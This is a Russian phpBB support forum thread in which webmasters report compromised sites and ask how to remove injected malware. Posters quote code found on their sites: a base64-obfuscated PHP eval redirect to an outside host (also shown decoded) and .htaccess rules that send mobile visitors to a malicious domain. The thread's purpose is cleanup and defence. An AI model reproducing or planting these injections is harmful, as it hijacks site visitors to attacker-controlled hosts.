Как убить Трояна?

AdmninsCluba · Сообщение **AdmninsCluba** » 12.05.2007 16:23

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

Сообщение **Sheer** » 26.10.2012 18:45

Татьяна5
Много ли у вас там модов стоит?

Татьяна5 писал(а):как хоть выловить код вируса (без перезаливки всех файлов)?

Скачайте все на локальный компьютер и сравнивайте файлы с дистрибутивом. WinMerge вам в помощь.

MIT · Сообщение **MIT** » 26.10.2012 22:49

Татьяна5, проверил в двух браузерах — редиректа нет.
В файлах ничего подозрительного не заметил.

МайскийЖук · 26.10.2012 22:54

Подтверждаю. На данный момент редиректа нет. Проверено в четырех браузерах.

Сообщение **Татьяна5** » 26.10.2012 22:56

Да, уже исправили (не я, так что не знаю что это было)

Pazh · Сообщение **Pazh** » 29.10.2012 19:06

Внимание! на radikal-е снова обнаружен троян, осторожней с этим сервисом

Di_Mok · Сообщение **Di_Mok** » 31.12.2012 2:55

Заимел в *.php такую прелесть:

Скрытый текст

Код: Выделить всё

<?php	                                       			eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9zaXRlLnBvcnRyZWxheS5jb20vIik7DQoJCWV4aXQoKTsNCgl9DQp9DQp9"));

Если по русски, вот:

Скрытый текст

Код: Выделить всё

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: http://site.portrelay.com/");
		exit();
	}
}
}

Компутер стерилен как нераспакованный презерватив. Хостер, штоли? Поменял пароль, будем посмотреть.

MIT · Сообщение **MIT** » 31.12.2012 10:30

Хостеру незачем заниматься такими глупостями. Ищи дырявые скрипты у себя. И ищи подозрительные и новые файлы — ты привёл только код полезной нагрузки, но не бекдор, который наверняка должен быть.

Ну и да, с чего ты взял, что компутер стерилен?

Di_Mok · Сообщение **Di_Mok** » 31.12.2012 13:14

MIT писал(а):Хостеру незачем заниматься такими глупостями

Я ж не гворю, что намеренно.

MIT писал(а):Ищи дырявые скрипты у себя. И ищи подозрительные и новые файлы

Это понятно, но пока не реально - праздники, блин.

MIT писал(а):Ну и да, с чего ты взял, что компутер стерилен?

Конечно, со 100% уверенностью сказать ничего нельзя. Но не давно перестановленная винда сминимальным набором софта аля: офис, ноутпад++, тотал, гимп... , и отсутствие привычки серфить где непопадя, придают некоторую уверенность

MAzZY · Сообщение **MAzZY** » 08.01.2013 11:29

Di_Mok, какой хостер? Недавно на Логоле было такое - всех заразили.

Di_Mok · Сообщение **Di_Mok** » 08.01.2013 11:50

Хороший хостинг в питере

MAzZY · Сообщение **MAzZY** » 08.01.2013 11:58

Тогда нет. Тогда искать шелл. Влезть могли разными способами, сейчас уже не сказать как. Если не получается самостоятельно решить - пиши в личку, помогу. Опыт имеется.

lesha20 · Сообщение **lesha20** » 16.01.2013 12:21

Сегодня были дополнены все файлы .htaccess на сайте, несмотря на запрет записи (444), следующими строчками:

Код: Выделить всё

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://critical-upd.ru/?upd&source=.htaccess [L,R=302] #

Примерно такие же записи были дополнены в .htaccess - 18 декабря 2012г.

Хостер говорит, что это уязвимость ваших скриптов. Что атрибут 444 на 644 могут поменять скрипты.

Что интересно - у измененных файлов не поменялась дата изменения, она осталась 19.12.12 - эта та дата, когда я восстановил все файлы .htaccess после случая 18.12.12. Скрипты тоже могут такое вытворять?

Также заметил, что в файлах .htaccess изменен формат переноса строк с UNIX на WINDOWS.

Сам я создал и захожу на хостинг через виртуальную машину, где установлен Windows 7, антивирус Касперского и ftp-клиент FileZilla Client. Пароли хранятся только в зашифрованном архиве, который после его закрытия затирает временную папку. В браузере и ftp-клиенте пароли (для захода на хостинг) не сохраняю.

Есть подозрения на ftp-клиент FileZilla Client, который утащил мои пароли. Хотя хостер настаивает, что это уязвимость ваших скриптов. А на самом деле как узнать кто, откуда, каким способом меняет файлы .htaccess?

МайскийЖук · 16.01.2013 12:25

Только на астральном уровне.

На какие конкретно скрипты грешит хостер? Так можно от любой проблемы отмазаться: «это ваши скрипты». А какие скрипты-то?

lesha20 · Сообщение **lesha20** » 16.01.2013 12:33

Я тоже задавал такой вопрос, ответ был:
Это уязвимость скриптов. Сайт сломан через дыры в скриптах а не через пароли.
У нас возможности отслеживать ваши скрипты нет.

А как еще можно изменить файлы .htaccess не затронув дату изменения?

МайскийЖук · 16.01.2013 12:35

Скрипты форумного движка phpBB3 не позволяют просто так изменять какие-либо файлы. Тем более, .htaccess. Это все, что я знаю.

Что еще есть на сайте/форуме?

phpBB Guru - Официальная русская поддержка форума phpBB3